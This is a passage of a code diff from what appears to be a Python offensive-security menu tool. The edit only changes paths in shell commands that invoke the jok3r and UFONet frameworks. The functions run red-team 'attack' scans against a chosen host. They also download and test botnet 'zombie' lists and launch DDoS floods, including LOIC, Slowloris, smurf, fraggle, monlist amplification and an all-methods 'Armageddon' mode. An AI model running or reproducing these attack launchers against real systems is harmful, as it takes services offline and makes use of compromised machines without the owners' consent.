python3 jok3r.py toolbox --update-all --auto', shell = True).wait() print("\n") return process def jok3r_3(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Showing all the tools in the toolbox " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; python3 jok3r.py toolbox --show-all', shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; python3 jok3r.py toolbox --show-all', shell = True).wait() print("\n") return process def jok3r_4(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Showing supported products for all services " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; python3 jok3r.py info --services', shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; python3 jok3r.py info --services', shell = True).wait() print("\n") return process def jok3r_5(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Performing a very fast-scan on " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; python3 jok3r.py attack -t %s --profile fast-scan --fast' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; python3 jok3r.py attack -t %s --profile fast-scan --fast' %(host), shell = True).wait() print("\n") return process def jok3r_6(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Run all security checks against " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; python3 jok3r.py attack -t %s --profile red-team --fast' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; python3 jok3r.py attack -t %s --profile red-team --fast' %(host), shell = True).wait() print("\n") return process def jok3r_7(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Searching for (critical vulns & easy to exploit) " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; python3 jok3r.py attack -t %s --profile red-team --fast' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; python3 jok3r.py attack -t %s --profile red-team --fast' %(host), shell = True).wait() print("\n") return process def jok3r_8(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Showing the full results from the security checks " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; xhost +; python3 jok3r.py db creds vulns mission hosts products services report quit; xhost -', shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; xhost +; python3 jok3r.py db creds vulns mission hosts products services report quit; xhost -', shell = True).wait() print("\n") return process def jok3r_9(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Clean & interact with DB (commands; help or quit 2 exit.)" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; python3 jok3r.py db "mission -d default"', shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; python3 jok3r.py db "mission -d default"', shell = True).wait() print("\n") return process @@ -260,51 +260,51 @@ def osmedeus_9(self): def ufonet_1(self): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Downloading list of bots from C.S" + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet --download-zombies', shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet --download-zombies', shell = True).wait() print("\n") return process def ufonet_2(self): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Testing If bots are alive" + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet -t ./botnet/zombies.txt', shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet -t botnet/zombies.txt', shell = True).wait() print("\n") return process def ufonet_3(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched Palantir 3.14 againist" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --loic "1000" --loris "1000" -a "%s"' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --loic "1000" --loris "1000" -a "%s"' %(host), shell = True).wait() print("\n") return process def ufonet_4(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched Socking_waves (instant-knockout!) againist" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --nuke "10000" -a "%s"' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --nuke "10000" -a "%s"' %(host), shell = True).wait() print("\n") return process def ufonet_5(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched xcom-1 (only DDoS) againist" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --spray "1000" --smurf "1000" --tachyon "1000" --monlist "1000" --fraggle "1000" --sniper "1000" -a "%s"' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --spray "1000" --smurf "1000" --tachyon "1000" --monlist "1000" --fraggle "1000" --sniper "1000" -a "%s"' %(host), shell = True).wait() print("\n") return process def ufonet_6(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched xcom-2 (only DoS) againist" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --loic "1000" --loris "1000" --ufosyn "1000" --xmas "1000" --nuke "1000" --ufoack "1000" --uforst "1000" --droper "1000" --overlap "1000" --pinger "1000" --ufoudp "1000" -a "%s"' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --loic "1000" --loris "1000" --ufosyn "1000" --xmas "1000" --nuke "1000" --ufoack "1000" --uforst "1000" --droper "1000" --overlap "1000" --pinger "1000" --ufoudp "1000" -a "%s"' %(host), shell = True).wait() print("\n") return process def ufonet_7(self): while True: try: print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched ufonet gui on http://localhost:9999" + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet --gui', shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet --gui', shell = True).wait() print("\n") return process except: ddos(self) def ufonet_8(self): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Started Grider (python3 ufonet --grider &)" + bcolors.BLUE + " ]" + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet --grider', shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet --grider', shell = True).wait() print("\n") return process def ufonet_9(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched Armageddon! (with ALL!)" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --loic "1000" --loris "1000" --ufosyn "1000" --spray "1000" --smurf "1000" --xmas "1000" --nuke "1000" --tachyon "1000" --monlist "1000" --fraggle "1000" --sniper "1000" --ufoack "1000" --uforst "1000" --droper "1000" --overlap "1000" --pinger "1000" --ufoudp "1000" -a "%s"' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/ufonet/; python3 ufonet -r "100" --threads "100" --loic "1000" --loris "1000" --ufosyn "1000" --spray "1000" --smurf "1000" --xmas "1000" --nuke "1000" --tachyon "1000" --monlist "1000" --fraggle "1000" --sniper "1000" --ufoack "1000" --uforst "1000" --droper "1000" --overlap "1000" --pinger "1000" --ufoudp "1000" -a "%s"' %(host), shell = True).wait() print("\n") return process